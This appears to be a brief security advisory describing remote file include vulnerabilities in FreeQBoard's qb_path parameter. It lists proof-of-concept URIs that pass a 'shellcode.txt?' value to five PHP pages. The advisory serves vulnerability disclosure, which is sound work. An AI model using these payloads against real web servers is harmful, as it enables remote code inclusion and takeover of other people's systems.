|
|
FreeQBoard QB_Path Parameter Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client. The following proof-of-concept URIs are available: http://www.example.com/[path]/index.php?qb_path=shellcode.txt? http://www.example.com/[path]/faq.php?qb_path=shellcode.txt? http://www.example.com/[path]/delete.php?qb_path=shellcode.txt? http://www.example.com/[path]/contact.php?qb_path=shellcode.txt? http://www.example.com/[path]/about.php?qb_path=shellcode.txt? |
|
Privacy Statement |